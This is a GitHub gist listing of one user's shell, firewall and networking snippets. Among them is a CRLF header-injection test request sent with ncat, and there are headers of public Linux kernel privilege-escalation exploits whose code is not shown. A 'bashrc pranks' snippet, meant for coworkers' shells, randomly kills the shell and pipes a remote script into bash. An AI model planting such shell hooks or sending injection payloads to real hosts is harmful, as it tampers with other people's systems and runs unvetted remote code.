Skip to content

Instantly share code, notes, and snippets.

View yoramvandevelde's full-sized avatar

Yoram van de Velde yoramvandevelde

13 followers · 32 following
  • Nijmegen, Netherlands
View GitHub Profile
@yoramvandevelde
yoramvandevelde / gist:b8afc4334911cfb84c65e15a92c0e187
Created October 31, 2023 12:23
Test for expanding pwd within an alias
yoram _ /tmp => alias aliaspwd='echo "`pwd`"'
yoram _ /tmp => aliaspwd
/tmp
yoram _ /tmp => cd ..
yoram _ / => aliaspwd
/
@yoramvandevelde
yoramvandevelde / gist:36de59f902c6cf30e2920514350ead7e
Created June 20, 2023 12:19
xdebug windows firewall
# Run as administrator
netsh advfirewall firewall add rule name="allow xdebug" dir=in action=allow protocol=TCP localport=9003
@yoramvandevelde
yoramvandevelde / gist:c1cd49e0c53c954b449980fb34bfac54
Created April 1, 2021 10:47
# Problem with header manipulation because of CRLF injection
# on nginx this is because of $host$uri usage over $host$request_uri
$ echo -e "GET /%0D%0ASet-Cookie: hack%0D%0AX-FoRwArDeDFor: yoram HTTP/1.1\r\nHost: $HOSTNAME\r\n" | \
ncat $HOSTNAME 80
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 01 Apr 2021 10:15:40 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
@yoramvandevelde
yoramvandevelde / gist:7b28df62a4f59ce98030a4b8091f1ac4
Created August 18, 2017 14:32
/*
* Linux Kernel <= 2.6.37 local privilege escalation
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc full-nelson.c -o full-nelson
* ./full-nelson
*
* This exploit leverages three vulnerabilities to get root, all of which were
@yoramvandevelde
yoramvandevelde / gist:628319d1ef4b8fe61fe9cb3b74b0e8b6
Created August 18, 2017 14:30
/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption
* Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
*
* coded by: sgrakkyu <at> antifork.org
* http://kernelbof.blogspot.com
*
*
* NOTE: you need at least one sctp application bound on the target box
*
* Supported target:
@yoramvandevelde
yoramvandevelde / gist:f7db41be62dd4e3e15b6bfba003b9763
Created August 18, 2017 14:22
/*
* diane_lane_fucked_hard.c
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.23 - 2.6.24
*/
#define _GNU_SOURCE
#include <stdio.h>
@yoramvandevelde
yoramvandevelde / gist:80d9508e94224b9dac08f75abc5fd1ba
Last active August 18, 2017 13:02
Making coworkers hate me through bashrc's
# https://www.quora.com/Bash-shell-What-are-the-best-bashrc-pranks/answer/Baptiste-Fontaine
trap '[ "$RANDOM" -le 2000 ] && exit' DEBUG
# confuse the damn kids
export PS1='C:${PWD////\\\\}> '
# sysadmin's april fouls rickroll
curl -s -L https://raw.githubusercontent.com/keroserene/rickrollrc/master/roll.sh | bash
# poor man's sl
@yoramvandevelde
yoramvandevelde / pipefail_examples.sh
Created August 17, 2017 07:13
Examples of why pipefail is really important to use
#!/bin/bash
# author: Yoram van de Velde ( [email protected] )
# Examples of why pipefail is really important to use.
# We enable exit on error functionality
set -o errexit
# These commands will fail but not stop the script because of the pipes
# to succesfull commands. This works because error is output to stderr,
@yoramvandevelde
yoramvandevelde / generate-netfilter-u32-dns-rule-with-CAA
Created July 18, 2017 14:27
#!/usr/bin/python
"""
Produces a Linux Netfilter u32 rule to match DNS requests for a given
domain name and/or a given query type.
Typical usage:
% python generate-netfilter-u32-rule.py --qname ripe.net --qtype ANY
Can be embedded in iptables' invocations for instance:
rule=$(python generate-rule.py args...)
@yoramvandevelde
yoramvandevelde / keybase.md
Created January 12, 2017 12:03

Keybase proof

I hereby claim:

  • I am yoramvandevelde on github.
  • I am yoram (https://keybase.io/yoram) on keybase.
  • I have a public key ASCWllnVtkiiXmGkq-GudwXvcbOUhPs3kzHm-pLwpppZ4Ao

To claim this, I am signing this object: